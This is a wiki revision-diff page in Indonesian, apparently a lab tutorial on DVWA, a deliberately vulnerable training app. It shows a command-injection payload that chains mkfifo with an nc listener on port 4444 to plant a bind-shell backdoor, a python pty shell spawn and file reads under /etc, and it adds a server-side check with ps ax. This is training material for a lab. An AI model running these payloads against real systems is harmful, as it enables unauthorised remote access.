Difference between revisions of "DVWA: Command Injection Back Door"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 22: | Line 22: | ||
python -c 'import pty; pty.spawn("/bin/sh")' | python -c 'import pty; pty.spawn("/bin/sh")' | ||
+ | |||
+ | ==Cek Operasional Back Door== | ||
+ | |||
+ | Di sisi server, dapat mencek adanya back door dengan | ||
+ | |||
+ | ps ax | ||
+ | |||
+ | nanti akan kelihatan mkfifo dkk | ||
==Pranala Menarik== | ==Pranala Menarik== | ||
* [[DVWA]] | * [[DVWA]] |
Revision as of 11:07, 17 November 2022
Backdoor pada port 4444 menggunakan perintah
mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dari command injection di DVWA masukan
192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
dimana 192.168.43.1 adalah salah satu IP mesin di jaringan
Selanjutnya kita bisa memasukan perintah2 shell seperti
ls cd /etc cat <namafile> dsb
Ujicoba
Percobaan untuk memperoleh shell
python -c 'import pty; pty.spawn("/bin/sh")'
Cek Operasional Back Door
Di sisi server, dapat mencek adanya back door dengan
ps ax
nanti akan kelihatan mkfifo dkk